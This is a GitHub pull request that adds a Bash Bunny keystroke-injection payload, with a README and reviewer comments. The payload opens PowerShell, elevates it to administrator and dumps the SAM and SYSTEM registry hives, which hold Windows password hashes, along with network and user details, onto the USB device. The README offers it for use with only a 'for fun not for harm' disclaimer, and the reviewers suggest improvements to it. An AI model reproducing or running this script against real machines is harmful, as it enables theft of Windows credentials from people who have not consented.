Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
18 changes: 18 additions & 0 deletions payloads/library/phishing/getWINDOWSpassword/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
AUTHOR: AlexanderWyt
SIDE NOTE: this is just a prototype and I will make a better one later

HOW IT WORKS:
It goes into a keyboard and storage.
Then it turns red.
Then it opens powershell via the run command.
Then it closes powershell and makes it run as admin.
Then it says yes to run as admin.
Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant))
Then it writes down the IPs. (so you know what to connect to)
Then it writes down the hashes with SAM and SYSTEM.
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This payload seems more fitting inside of the exfiltration category due to its nature. Please move it into that category directory.

DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny.
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please add a note instructing the end user to make a directory on the BashBunny root directory named nothingwashereorwillhappen as this is critical to the payload running. I would recommend renaming this directory to just be loot to simplify thing as I did in my code example.

If there is more than one storage unit change it. (I know this is not the most ethical way but I am gonna fix that in the next verison.)
Then it exits, minimizes all windows, and the bash bunny disconnects and turns green.

ANOTHER SIDE NOTE: if you want to know how you can use this go to: (https://www.youtube.com/watch?v=L26Xq7m0uQ0&list=PLTnKEBOD8VBgfdK-nMiS3-oLM6gz3OHEx&)
and keep in mind this is for fun not for harm
28 changes: 28 additions & 0 deletions payloads/library/phishing/getWINDOWSpassword/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
ATTACKMODE HID STORAGE
LED R
QUACK GUI r
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "exit Start-Process powershell -Verb RunAs"
QUACK ENTER
QUACK DELAY 2200
QUACK ALT Y
QUACK DELAY 1000
QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'"
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Not everyone's BashBunny will mount as D:/ drive. A better approach to this is use the BashBunny drive label.

DRIVE_LABEL="BashBunny"
QUICK STRING '$Drive = (Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq "'$DRIVE_LABEL'" }).DriveLetter + "\"; $Drive'

This will have powershell use the BashBunny Label to locate the drive letter of the bash bunny and export it as a powershell variable you can then later use for saving files to the BashBunny.

Just as a example:

QUACK STRING 'whoami /all | Out-File -FilePath "$($DRIVE)\loot\waitwhoamI.txt"'` 

Please make this change across your payload and be mindful for syntax overlaps.

QUACK ENTER
QUACK DELAY 100
QUACK STRING "whoamI /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\waitwhoamI.txt'"
QUACK ENTER
QUACK DELAY 100
QUACK STRING "reg save HKLM\sam D:\nothingwashereorwillhappen\whoisSAManyway.save"
QUACK ENTER
QUACK DELAY 100
QUACK STRING "reg save HKLM\system D:\nothingwashereorwillhappen\itsSAMSsystem.save"
QUACK ENTER
QUACK DELAY 150
QUACK STRING "exit"
QUACK ENTER
QUACK GUI m
ATTACKMODE OFF
LED G